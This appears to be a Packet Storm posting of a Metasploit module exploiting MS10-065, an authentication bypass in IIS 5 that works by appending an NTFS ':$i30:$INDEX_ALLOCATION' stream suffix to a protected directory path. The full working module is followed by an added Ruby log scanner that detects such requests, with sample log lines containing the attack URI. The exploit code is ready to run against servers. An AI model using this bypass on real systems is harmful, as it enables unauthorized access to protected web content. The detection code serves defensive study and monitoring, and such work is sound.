MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass

This Metasploit module bypasses basic authentication for Internet Information Services (IIS). By appending the NTFS stream name to the directory name in a request, it is possible to bypass authentication.

Packet Storm
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass',
        'Description' => %q{
          This module bypasses basic authentication for Internet Information Services (IIS).
          By appending the NTFS stream name to the directory name in a request, it is
          possible to bypass authentication.
        },
        'References' => [
          [ 'CVE', '2010-2731' ],
          [ 'OSVDB', '66160' ],
          [ 'MSB', 'MS10-065' ],
          [ 'URL', 'https://soroush.secproject.com/blog/2010/07/iis5-1-directory-authentication-bypass-by-using-i30index_allocation/' ]
        ],
        'Author' => [
          'Soroush Dalili',
          'sinn3r'
        ],
        'License' => MSF_LICENSE,
        'DisclosureDate' => '2010-07-02'
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI directory where basic auth is enabled', '/'])
      ]
    )
  end

  def has_auth
    uri = normalize_uri(target_uri.path)
    uri << '/' if uri[-1, 1] != '/'

    res = send_request_cgi({
      'uri' => uri,
      'method' => 'GET'
    })
    vprint_status(res.body) if res

    return (res and res.code == 401)
  end

  def try_auth
    uri = normalize_uri(target_uri.path)
    uri << '/' if uri[-1, 1] != '/'
    uri << Rex::Text.rand_text_alpha(rand(5..14)) + ".#{Rex::Text.rand_text_alpha(3)}"

    dir = File.dirname(uri) + ':$i30:$INDEX_ALLOCATION' + '/'

    user = Rex::Text.rand_text_alpha(rand(5..14))
    pass = Rex::Text.rand_text_alpha(rand(5..14))

    vprint_status("Requesting: #{dir}")
    res = send_request_cgi({
      'uri' => dir,
      'method' => 'GET',
      'authorization' => basic_auth(user, pass)
    })
    vprint_status(res.body) if res

    return (res && (res.code != 401) && (res.code != 404)) ? dir : ''
  end

  def run
    if !has_auth
      print_error('No basic authentication enabled')
      return
    end

    bypass_string = try_auth

    if bypass_string.empty?
      print_error('The bypass attempt did not work')
    else
      print_good("You can bypass auth by doing: #{bypass_string}")
    end
  end
end
```
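
On the detection side, requests of this shape stand out in web server logs. The following added example (not part of the Metasploit module or the original page) scans W3C extended format log lines for an NTFS stream suffix in the URI path, percent-decoding first, and goes slightly beyond the page by also matching the `::$DATA` form. The log lines, IP addresses, paths and the `#Fields` layout are constructed assumptions.

```ruby
# Added example: flag NTFS stream syntax in IIS W3C extended log lines.

# ":<stream name>:$<attribute type>" inside the path, e.g. the module's
# ":$i30:$INDEX_ALLOCATION", or "::$DATA" (generalization beyond the page).
STREAM_SUFFIX = /:[^\/:]*:\$(?:INDEX_ALLOCATION|DATA)/i

# Percent-decode in binary so malformed or non-UTF-8 input never raises.
def percent_decode(str)
  str.b.gsub(/%(\h\h)/) { Regexp.last_match(1).hex.chr }
end

# Returns one hash per suspicious request. :served mirrors the module's
# success test: a status other than 401 or 404 means content was returned.
def find_stream_requests(log_text)
  fields = []
  hits = []
  log_text.each_line do |line|
    line = line.strip
    if line.start_with?('#Fields:')
      fields = line.sub('#Fields:', '').split
      next
    end
    next if line.empty? || line.start_with?('#') || fields.empty?

    row = fields.zip(line.split).to_h
    stem = percent_decode(row['cs-uri-stem'].to_s)
    next unless stem.match?(STREAM_SUFFIX)

    status = row['sc-status'].to_i
    hits << { ip: row['c-ip'], uri: stem, status: status,
              served: ![401, 404].include?(status) }
  end
  hits
end

# Constructed sample log (documentation IP addresses, made-up paths).
SAMPLE_LOG = <<~'LOG'
  #Software: Microsoft Internet Information Services 5.0
  #Fields: date time c-ip cs-method cs-uri-stem sc-status
  2010-07-05 10:01:12 192.0.2.10 GET /secure/ 401
  2010-07-05 10:01:13 192.0.2.10 GET /secure:$i30:$INDEX_ALLOCATION/ 200
  2010-07-05 10:02:40 198.51.100.7 GET /secure%3A%24I30%3A%24index_allocation/ 401
  2010-07-05 10:03:02 203.0.113.5 GET /images/logo.gif 200
LOG

find_stream_requests(SAMPLE_LOG).each do |h|
  puts "#{h[:ip]} #{h[:status]} #{h[:served] ? 'SERVED' : 'blocked'} #{h[:uri]}"
end
```

A hit with `served` set to true on a directory that normally answers 401 is the case to investigate first.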
